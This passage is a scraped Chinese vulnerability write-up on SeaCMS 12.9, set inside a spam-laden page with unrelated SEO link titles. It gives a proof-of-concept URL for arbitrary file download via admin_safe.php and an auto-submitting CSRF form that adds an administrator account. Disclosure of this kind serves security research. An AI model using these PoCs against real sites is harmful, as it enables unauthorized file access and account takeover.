当前位置: 首页 > news >正文

系统开发应注重对反洗钱系统进行运行维护和统一管理太原网站优化

系统开发应注重对反洗钱系统进行运行维护和统一管理,太原网站优化,做数据分析网站,苏州网站建设凡科文章目录 admin/admin_safe.php任意文件下载CSRF 添加管理员账户CSRF配合XSS弹cookie admin/admin_safe.php任意文件下载 在admin_safe.php文件下有着这么一段代码,他的作用时检查action的值是否为download,如果为download那么将你传入的文件直接打印给…

文章目录

    • admin/admin_safe.php任意文件下载
    • CSRF 添加管理员账户
    • CSRF配合XSS弹cookie

admin/admin_safe.php任意文件下载

在admin_safe.php文件下有着这么一段代码,他的作用时检查action的值是否为download,如果为download那么将你传入的文件直接打印给你。这里并未对用户传入的file变量做任何过滤。
在这里插入图片描述
poc:http://www.seacms/ozcf6u/admin_safe.php?action=scan&file=E:/phpStudy_64/phpstudy_pro/WWW/SeaCMS_12.9/Upload/ozcf6u/admin_safe.php,即可下载任意目录下的文件。
在这里插入图片描述

CSRF 添加管理员账户

poc:

<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><form action="http://www.seacms/ozcf6u/admin_manager.php?action=add" method="POST"><input type="hidden" name="username" value="test" /><input type="hidden" name="pwd" value="test" /><input type="hidden" name="pwd2" value="test" /><input type="hidden" name="groupid" value="1" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body>
</html>

成功效果图:
在这里插入图片描述

CSRF配合XSS弹cookie

很多漏洞网上很多师傅都大多复现过,大同小异,这里就不赘述了。

http://www.yayakq.cn/news/522680/

相关文章:

  • 做网站服装app门网站制作
  • 网站点击推广中企动力科技是干嘛的
  • 如何提高网站优化软件行业发展趋势
  • 深圳网站开发公司h5市场营销策划方案3000字
  • 赣州网上注册公司网站竞价托管信息
  • 做网站中二级导航链接到一级导航泰州网站制作平台
  • 工程建设与设计好发表吗seo最好的网站
  • 临沂网站建设平台学习做网站建设的学校
  • 柯桥教育网站建设有哪些做特卖的网站
  • 网站建设美词原创最超值的锦州网站建设
  • 做类似昵图网网站wordpress 不用ftp
  • 网站设计制作策划中国公司名录大全
  • 海宁市规划建设局网站大连市网站建设
  • 河南省城乡和住房建设厅网站首页东莞东城
  • 网站建设人员岗位职责开发公司工程部年终总结
  • 站内营销推广方式有哪些网站建设板块如何分类
  • 鹤壁做网站优化如何做导购网站
  • 淮阳城乡建设局网站wordpress 自定义参数
  • 中山 家居 骏域网站建设专家app应用开发在哪里找
  • 山东官方网站建设活动策划方案
  • 深圳微商城网站建设茂名做网站的公司
  • 网站开发找哪个网站建设相关优化
  • 大连科技公司建设网站新闻发布会发言稿
  • 深圳营销型网站建设服务文旅部:不随意关停娱乐场所
  • 中美网站建设南通网站建设费用
  • 贵州能源网站 中企动力建设苏州广告公司招聘
  • 高新网站建设多少钱做网站还要数据库吗
  • 广州车陂网站建设中心局域网搭建工具
  • 丽水专业网站制作公司酒吧网站模板
  • 网页小游戏的网站长安网站制作公司